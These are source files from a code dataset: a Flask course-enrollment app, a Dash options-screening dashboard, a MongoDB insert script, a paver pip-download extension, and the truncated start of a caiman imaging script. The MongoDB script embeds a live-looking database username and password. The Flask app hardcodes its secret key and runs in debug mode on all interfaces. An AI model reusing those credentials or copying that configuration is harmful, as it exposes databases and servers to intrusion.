+{"seq_id": "516869642", "text": "from flask import Flask, request, render_template, redirect, url_for, flash\nimport dao.connect\nimport threading\nimport csv\nimport re\nimport beans.fach\nimport dao.application_dao\nfrom beans import fach\n\n\napp = Flask(__name__, template_folder='template')\napp.secret_key = b'hdgsJ%82/\"*dbh#'\n\n\ndef csv_reader(path):\n with open(path, \"r\") as csvfile:\n tmp = {}\n reader = csv.reader(csvfile, delimiter='=')\n for line in reader:\n tmp[line[0]] = line[1]\n return tmp\n\nconfig = csv_reader(\"properties.settings\")\n\n\n@app.route(\"//\", methods=['GET', 'POST'])\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index(bid):\n \"\"\"Erste Seite der Webseite: \"\"\"\n user_store = dao.application_dao.ApplicationDao() \n\n meine_kurse = user_store.get_my_courses(bid)\n verf_kurse = user_store.get_all_other_courses(bid)\n\n #result = False\n #if request.method == \"POST\":\n # Form data\n #name = request.form['course_name'] \n #enroll_key = request.form.get('schluessel')\n #free_spots = request.form.get('freie_plaetze') \n #desc = request.form.get('btext')\n \n #print(name, bid, enroll_key, free_spots, desc)\n \n #new_course = fach.Kurs(name, bid, free_spots, desc, enroll_key)\n \n #course_store = dao.application_dao.ApplicationDao()\n\n #course_id = course_store.add_course(new_course) # Muss eine valide kid zurückliefern\n #print(course_id, bid)\n #course_store.completion()\n #course_store.close()\n\n #if course_id is not None: #Wenn course_id nicht NULL ist, ist es valid #TODO\n #with threading.Lock():\n #user_store.einschreiben(bid, course_id, enroll_key) #Add owner to course, Fix\n \n #user_store.completion()\n #user_store.close()\n\n # TODO res=result\n return render_template('index.html', mkurse=meine_kurse, vkurse=verf_kurse, bid=bid)\n\n\n@app.route(\"//new_course\", methods=['POST', 'GET'])\ndef new_course(bid):\n return render_template(\"new_course.html\", bid=bid)\n\n\n@app.route(\"//view_course\", methods=['POST', 'GET'])\ndef view_course(bid):\n info_store = dao.application_dao.ApplicationDao()\n kname = str(request.form.get(\"kname\"))\n ersteller = str(request.form.get(\"ersteller\"))\n fp = request.form.get(\"fp\")\n\n #print(bid)\n\n #Einschreibeschlüssel, wenn vorhanden. Wird benutzt zu prüfen, ob ein Schlüssel stimmt\n reg_key = info_store.get_key(kname, ersteller) \n\n #course owner\n owner = info_store.get_course_owner(kname) \n #print(owner)\n\n desc = info_store.get_course_details(kname, ersteller)\n\n # Read details for above data from database \n\n #course id\n kid = info_store.get_kid(kname, ersteller)\n\n #print(ersteller)\n #print(kid)\n #print(bid)\n\n #check resgistrstion status. Returns True or False\n registered = info_store.is_registered(bid, kid)\n\n #print(bid, kid)\n #print(registered)\n\n exercises = None\n\n #Get exercises for kid retieved\n exercises = info_store.get_ex_list(kid, int(bid))\n\n # TODO: Different view for ersteller\n\n\n return render_template(\"view_course.html\", bid=bid, kname=kname, desc=desc, fp=fp, \n ersteller=ersteller, schluessel=reg_key, owner=owner, exercises=exercises, \n registered=registered, kid=kid)\n\n\n@app.route('//new_enroll', methods=['POST', 'GET'])\ndef new_enroll(bid):\n kname = request.form.get(\"kname\")\n ersteller = request.form.get(\"ersteller\")\n\n\n return render_template('new_enroll.html', bid=bid, kname=kname, ersteller=ersteller)\n\n\n@app.route('//new_assignment', methods=['POST', 'GET'])\ndef new_assignment(bid):\n\n store_submission = dao.application_dao.ApplicationDao()\n \n kid = request.form.get('kid')\n\n anummer = request.form.get('anummer')\n\n kname = request.form.get('kname')\n\n ex_name = request.form.get('ex_name')\n\n\n #TODO: decription\n #desc = store_submission.get_ex_details(kid, anummer)\n\n\n #print(bid, kid, anummer)\n\n #Submissions should be done only once: TODO: Is defective\n #is_duplicate = store_submission.submission_exists(bid, kid, anummer)\n\n #print(is_duplicate) TODO\n\n return render_template('new_assignment.html', kname=kname, ex_name=ex_name)\n\n\n@app.route('/onlineLearner', methods=['GET'])\ndef onlineLearn():\n\n try:\n dbExists = dao.connect.DBUtil().checkDatabaseExistsExternal()\n if dbExists:\n db2exists = 'vorhanden! Supi!'\n else:\n db2exists = 'nicht vorhanden :-('\n except Exception as e:\n print(e)\n\n return render_template('onlineLearner.html', db2exists=db2exists, db2name=\"onlineLearner\")\n\n\n\n\n\nif __name__ == \"__main__\":\n port = int(\"9\" + re.match(r\"([a-z]+)([0-9]+)\", config[\"username\"], re.I).groups()[1])\n app.run(host='0.0.0.0', port=port, debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4838, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 18, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 30, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 72, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 72, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 73, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 74, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 111, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 122, "usage_type": "call"}, {"api_name": "dao.connect.application_dao.ApplicationDao", "line_number": 128, "usage_type": "call"}, {"api_name": "dao.connect.application_dao", "line_number": 128, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 128, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 132, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 136, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 150, "usage_type": "call"}, {"api_name": "dao.connect.connect.DBUtil", "line_number": 157, "usage_type": "call"}, {"api_name": "dao.connect.connect", "line_number": 157, "usage_type": "attribute"}, {"api_name": "dao.connect", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 165, "usage_type": "call"}, {"api_name": "re.match", "line_number": 172, "usage_type": "call"}, {"api_name": "re.I", "line_number": 172, "usage_type": "attribute"}]}
+{"seq_id": "269776011", "text": "# Import required libraries\nimport os\nimport datetime as dt\n\nimport numpy as np\nimport pandas as pd\nimport plotly.plotly as py\nimport flask\nimport dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nimport dash_table_experiments as dasht\n\nfrom py_vollib.black_scholes_merton.implied_volatility import *\nfrom py_vollib.black_scholes_merton.greeks.analytical import *\nfrom data_collect import *\n\n\n# Setup app\n# server = flask.Flask(__name__)\n# server.secret_key = os.environ.get('secret_key', 'secret')\n# app = dash.Dash(__name__, server=server, url_base_pathname='/dash/gallery/volatility-surface', csrf_protect=False)\napp = dash.Dash(__name__)\n#server = app.server\n\nexternal_css = [\"https://fonts.googleapis.com/css?family=Overpass:300,300i\",\n \"https://cdn.rawgit.com/plotly/dash-app-stylesheets/dab6f937fd5548cebf4c6dc7e93a10ac438f5efb/dash-technical-charting.css\"]\n\nfor css in external_css:\n app.css.append_css({\"external_url\": css})\n\nif 'DYNO' in os.environ:\n app.scripts.append_script({\n 'external_url': 'https://cdn.rawgit.com/chriddyp/ca0d8f02a1659981a0ea7f013a378bbd/raw/e79f3f789517deec58f41251f7dbb6bee72c44ab/plotly_ga.js'\n })\n \n\ndef generate_table(dataframe):\n return html.Table(\n # Header\n [html.Tr([html.Th(col) for col in dataframe.columns])] +\n\n # Body\n [html.Tr([\n html.Td(dataframe.iloc[i][col]) for col in dataframe.columns\n ]) for i in range(len(dataframe))]\n )\n\n# Make app layout\napp.layout = html.Div(\n [\n html.Div([\n html.Img(\n src=\"http://fchen.info/wp-content/uploads/2016/10/fclogo2.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '60',\n 'float': 'left',\n 'position': 'relative',\n },\n ),\n html.H1(\n 'Earnings Screening',\n className='eight columns',\n style={'text-align': 'center'}\n ),\n html.Img(\n src=\"https://s3-us-west-1.amazonaws.com/plotly-tutorials/logo/new-branding/dash-logo-by-plotly-stripe.png\",\n className='two columns',\n style={\n 'height': '60',\n 'width': '135',\n 'float': 'right',\n 'position': 'relative',\n },\n ),\n ],\n className='row'\n ),\n html.Hr(style={'margin': '0', 'margin-bottom': '5'}),\n \n ################# Input for Earnings DF Layout ########################\n html.Div([\n html.H4(\n 'Upcoming Earnings',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n html.Div([\n html.Div([\n html.Label('Starting Date:',\n style={'text-align': 'center'}),\n dcc.DatePickerSingle(\n id='startdate',\n date=dt.date.today(),\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n ),\n html.Div([\n html.Label('Days Forward:',\n style={'text-align': 'left'}),\n dcc.Slider(\n id='forward_days',\n marks={i: '{}'.format(i) for i in range(11)},\n min=0,\n max=10,\n step=1,\n value=0\n )\n ],\n className='six columns',\n style={'margin-bottom': '20'}\n ),\n html.Div([\n html.Label('Earnings Query:'),\n html.Button('Submit Earnings Query', id='earnings_query'),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='three columns',\n )\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n\t\t\n\t\thtml.Div([\n html.Div([\n html.Label('Max Strike Gap:'),\n dcc.Input(\n id='max_gap',\n type='number',\n value=5\n )\n ], \n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('DTE Threshold:'),\n dcc.Input(\n id='dte_thresh',\n type='number',\n value=5\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n html.Div([\n html.Label('Strike Filter Type:'),\n dcc.Input(\n id='strike_filter',\n type='text',\n value='bounds'\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n \n html.Div([\n html.Label('Moneyness Threshold:'),\n dcc.Input(\n id='money_thresh',\n type='number',\n value=0.1\n )\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n\t\t\thtml.Div([\n html.Label('Strike Adjustment:'),\n dcc.Input(\n id='bounds_adj',\n type='number',\n value=0,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='two columns',\n ),\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Earnings DF Layout ########################\n html.Div([\n html.Button('Update Earnings Table', id='earnings_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='e_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ),\n \n ################# Input for Condors DF Layout ########################\n html.Div([\n html.H4(\n 'Potential Condors',\n className='twelve columns',\n style={'text-align': 'center'}\n ),\n ],\n className='row',\n style={'margin-bottom': '20'}\n ), \n \n \n html.Div([\n html.Div([\n html.Label('Delta Threshold:'),\n dcc.Input(\n id='delta_thresh',\n type='number',\n value=0.03\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Minimum Premium:'),\n dcc.Input(\n id='minimum_prem',\n type='number',\n value=0.15,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n ),\n html.Div([\n html.Label('Risk Reward Threshold:'),\n dcc.Input(\n id='rr_thresh',\n type='number',\n value=0.2,\n ),\n ],\n style={'text-align': 'center',\n 'vertical-align': 'middle',\n 'display': 'table-cell'},\n className='four columns',\n )\n ],\n className='row',\n style={'margin-bottom': '10'}\n ),\n \n ################# Condors DF Layout ########################\n \n html.Div([\n html.Button('Update Condors Table', id='condors_show'),\n dasht.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n id='c_table'\n ),\n html.Div(id='selected-indexes')\n ],\n className='row',\n style={'margin-bottom': '20',\n 'text-align': 'center'}\n ), \n \n # Temporary hack for live dataframe caching\n # 'hidden' set to 'loaded' triggers next callback\n html.P(\n hidden='',\n id='raw_container',\n style={'display': 'none'}\n )\n ],\n style={\n 'width': '85%',\n 'max-width': '1200',\n 'margin-left': 'auto',\n 'margin-right': 'auto',\n 'font-family': 'overpass',\n 'background-color': '#FFFFFF',\n 'padding': '40',\n 'padding-top': '20',\n 'padding-bottom': '20',\n },\n)\n\n# Cache raw data\n@app.callback(\n Output('raw_container', 'hidden'),\n [Input('earnings_query', 'n_clicks')],\n [State('startdate','date'),\n State('forward_days','value'),\n State('max_gap','value'),\n State('dte_thresh','value'),\n State('strike_filter','value'),\n State('money_thresh','value'),\n\t\t State('bounds_adj','value')])\ndef cache_earnings(n_clicks, startdate, fwd_days, maxgap, dtethresh,\n strikefilter, moneythresh, boundsadj):\n\n global earnings_df, condors_df\n start_date = dt.datetime.strptime(startdate, '%Y-%m-%d')\n earnings_df = earnings(start_date, fwd_days)\n \n condors_df = condor_screener(earnings_df, max_gap = maxgap, dte_thresh = dtethresh, \n money_thresh = moneythresh, delta_thresh = 0.03, \n minimum_prem = 0.1, bounds_adj = boundsadj, \n rr_thresh = 0.1, strike_filter = strikefilter)\n \n print('Loaded raw data')\n return 'loaded'\n\n\n@app.callback(\n Output('e_table', 'rows'), \n [Input('earnings_show', 'n_clicks')],\n [State('raw_container', 'hidden')])\ndef update_e_table(n_clicks, hidden):\n if hidden == 'loaded':\n return earnings_df.to_dict('records')\n\n@app.callback(\n Output('c_table', 'rows'), \n [Input('condors_show', 'n_clicks')],\n [State('raw_container', 'hidden'),\n\t\t State('delta_thresh','value'),\n State('minimum_prem','value'),\n State('rr_thresh','value')])\ndef update_c_table(n_clicks, hidden, deltathresh, \n minimumprem, rrthresh):\n if hidden == 'loaded':\n filtered_condors = condors_df[(abs(condors_df['Delta']) <= deltathresh) & \n (condors_df['Premium'] >= minimumprem) & \n (condors_df['RiskRewardRatio'] >= rrthresh)]\n return filtered_condors.to_dict('records')\n\nif __name__ == '__main__':\n app.server.run(port=8000, debug=True, threaded=True, use_reloader=False)\n #app.run_server(debug = True)", "sub_path": "Earnings Scanner/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 12657, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dash.Dash", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "dash_html_components.Table", "line_number": 41, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 43, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 46, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 47, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 52, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 54, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 55, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 65, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 70, "usage_type": "call"}, {"api_name": "dash_html_components.Hr", "line_number": 83, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 86, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 87, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 97, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 98, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 99, "usage_type": "call"}, {"api_name": "dash_core_components.DatePickerSingle", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 103, "usage_type": "attribute"}, {"api_name": "dash_html_components.Div", "line_number": 111, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 112, "usage_type": "call"}, {"api_name": "dash_core_components.Slider", "line_number": 114, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 126, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 127, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 141, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 142, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 154, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 155, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 156, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 167, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 168, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 169, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 181, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 182, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 183, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 194, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 195, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 196, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 213, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 214, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 215, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 224, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 232, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 233, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 244, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 245, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 246, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 247, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 258, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 259, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 260, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 271, "usage_type": "call"}, {"api_name": "dash_html_components.Label", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 273, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 292, "usage_type": "call"}, {"api_name": "dash_table_experiments.DataTable", "line_number": 293, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 302, "usage_type": "call"}, {"api_name": "dash_html_components.P", "line_number": 311, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 345, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 345, "usage_type": "attribute"}, {"api_name": "dash.dependencies.Output", "line_number": 332, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 333, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 334, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 335, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 336, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 337, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 338, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 339, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 340, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 358, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 359, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 360, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 366, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 367, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 368, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 369, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 371, "usage_type": "call"}]}
+{"seq_id": "486986209", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nimport json\n\ndef connection():\n \"\"\"\n This function connect to the MongoDB\n \"\"\"\n client = MongoClient('mongodb+srv://backend:WvtTqCuH3nNkS5SL@holmes.ieany.mongodb.net/')\n db = client.holmes\n\n return db\n\ndef insert():\n new_conecction = connection()\n\n sale = new_conecction.sale\n rent = new_conecction.rent\n\n #Get the JSON document with the Values\n with open(r'.\\json\\property_sale.json') as json_file:\n property_sale = json.load(json_file)\n\n with open(r'.\\json\\property_rent.json') as json_file:\n property_rent = json.load(json_file)\n\n #Insert objects into MongoDB\n try:\n #Delete the Mongo documents, just for Test purpose\n \"\"\" print('Cleaning the BD...')\n sale.delete_many({})\n rent.delete_many({}) \"\"\"\n\n #Insert new Values\n print('Inserting new values...')\n result = sale.insert_many(property_sale)\n print('Property for sale were successfully inserted in DB')\n\n result = rent.insert_many(property_rent)\n print('Property for rent were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\ndef insert_cities(json):\n new_conecction = connection()\n\n cities = new_conecction.cities\n\n try:\n #Delete the Mongo documents, just for Test purpose\n print('Cleaning the BD...')\n cities.delete_many({})\n\n print('Inserting Cities')\n cities.insert_many(json)\n\n print('Cities were successfully inserted in DB')\n\n except NameError:\n print(f'No objects were inserted {NameError}')\n\nif __name__ == \"__main__\":\n insert()", "sub_path": "backend/ds/scraper/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 1702, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 22, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "363609930", "text": "# -*- coding: utf-8 -*-\n# ============================================================================\n# PAVER EXTENSION: Download dependencies with pip via requirements files\n# ============================================================================\n\"\"\"\nA paver extension that provides pip related tasks:\n - download dependent packages\n - build a local packages index for downloaded packages\n\nEXPECTED OPTIONS STRUCTURE:\n options.develop\n .requirements_files -- List of requirements files to use.\n .download_dir -- Directory for downloaded packages.\n\nREQUIRES:\n * paver >= 1.0.4\n * pip >= 1.1\n * pip2pi > 0.1.1 (for localpi)\n\nSEE ALSO:\n * http://www.blueskyonmars.com/projects/paver/\n * http://pypi.python.org/pypi/Paver/\n * http://pypi.python.org/pypi/pip/\n * http://pypi.python.org/pypi/pip2pi/\n\"\"\"\n\nfrom paver.easy import info, options, path, sh, task, call_task\n\n# ----------------------------------------------------------------------------\n# TASKS:\n# ----------------------------------------------------------------------------\n@task\ndef download_depends():\n \"\"\"Download all dependencies (python packages) with pip.\"\"\"\n download_dir = options.develop.download_dir\n info(\"DOWNLOAD ALL DEPENDENCIES: {0}/\".format(download_dir))\n pip_download(download_dir,\n requirements_files=options.develop.requirements_files)\n\n@task\ndef localpi():\n \"\"\"Make local package index (used by tox).\"\"\"\n download_dir = path(options.develop.download_dir)\n if not download_dir.exists():\n call_task(\"download_depends\")\n info(\"MAKE LOCAL PACKAGE-INDEX: {0}/\".format(download_dir))\n sh(\"dir2pi {download_dir}\".format(download_dir=download_dir))\n # -- ALTERNATIVE:\n # for reqs in requirement_files:\n # sh(\"pip2pi downloads -r {requirements}\".format(requirements=reqs))\n\n# ----------------------------------------------------------------------------\n# UTILS:\n# ----------------------------------------------------------------------------\ndef pip_download(download_dir, cmdopts=\"\", requirements_files=None):\n \"\"\"Download all dependencies with pip by using requirement files, etc.\"\"\"\n if not cmdopts and not requirements_files:\n assert False, \"Neither requirement_files nor cmdopts provided.\"\n\n # -- NORMAL-CASE:\n # NOTE: --exists-action option requires pip >= 1.1\n download_dir = path(download_dir)\n download_dir.makedirs()\n pip_download_cmd = \"pip install --no-install --exists-action=i\"\n pip_download_cmd += \" --download={0}\".format(download_dir)\n\n if requirements_files:\n # -- WITH REQUIREMENT FILES:\n for requirements_file in requirements_files:\n sh(\"{pip_download} {cmdopts} -r {requirements_file}\"\\\n .format(pip_download=pip_download_cmd, cmdopts=cmdopts,\n requirements_file=requirements_file))\n else:\n # -- NO REQUIREMENT FILES: Requirement in cmdopts, ala: argparse>=1.2\n assert cmdopts\n sh(\"{pip_download} {cmdopts}\".format(\n pip_download=pip_download_cmd, cmdopts=cmdopts))\n", "sub_path": "paver_ext/pip_download.py", "file_name": "pip_download.py", "file_ext": "py", "file_size_in_byte": 3100, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "paver.easy.options.develop", "line_number": 35, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 35, "usage_type": "name"}, {"api_name": "paver.easy.info", "line_number": 36, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 38, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 38, "usage_type": "name"}, {"api_name": "paver.easy.task", "line_number": 32, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 43, "usage_type": "call"}, {"api_name": "paver.easy.options.develop", "line_number": 43, "usage_type": "attribute"}, {"api_name": "paver.easy.options", "line_number": 43, "usage_type": "name"}, {"api_name": "paver.easy.call_task", "line_number": 45, "usage_type": "call"}, {"api_name": "paver.easy.info", "line_number": 46, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 47, "usage_type": "call"}, {"api_name": "paver.easy.task", "line_number": 40, "usage_type": "name"}, {"api_name": "paver.easy.path", "line_number": 62, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 70, "usage_type": "call"}, {"api_name": "paver.easy.sh", "line_number": 76, "usage_type": "call"}]}
+{"seq_id": "620380323", "text": "\"\"\"\nThis not a part of NeuroAnalysisTools\nrun it in an environment with caiman installed\nin command line\n\nfor example:\n>>> activate ciaman\n\"\"\"\n\nimport os\nimport glob\nimport numpy as np\nimport caiman as cm\nfrom caiman.source_extraction import cnmf as cnmf\nimport h5py\nfrom shutil import copyfile\n\n\"\"\"\nthe most relevant parameter is K.\nSmaller K gives less ROIs.\nBigger K gives more ROIs\n\"\"\"\n\ndef run():\n\n date_recorded = '200210'\n mouse_id = 'M504408'\n resolution = (512, 512)\n channel = 'green'\n data_folder_n = '110_LSVDGCUC_reorged'\n imaging_mode = '2p' # '2p' or 'deepscope'\n n_process = 4\n\n # ========================= caiman parameters for boutons ================================================\n # ============ sutter scope, zoom 4, 5 frames online average, 5 frames offline average ===================\n # fr = 2. # frame rate (Hz)\n # decay_time = 0.5 # approximate length of transient event in seconds\n gSig = (5, 5) # expected half size of neurons, (8, 8) for soma at zoom 2 on sutter scope\n p = 2 # order of AR indicator dynamics\n # min_SNR = 3 # minimum SNR for accepting new components\n # rval_thr = 0.80 # correlation threshold for new component inclusion\n # ds_factor = 1 # spatial downsampling factor (increases speed but may lose some fine structure)\n # gnb = 2 # number of background components\n # gSig = tuple(np.ceil(np.array(gSig) / ds_factor).astype('int')) # recompute gSig if downsampling is involved\n mot_corr = False # flag for online motion correction\n pw_rigid = False # flag for pw-rigid motion correction (slower but potentially more accurate)\n # max_shifts_online = np.ceil(10. / ds_factor).astype('int') # maximum allowed shift during motion correction\n # 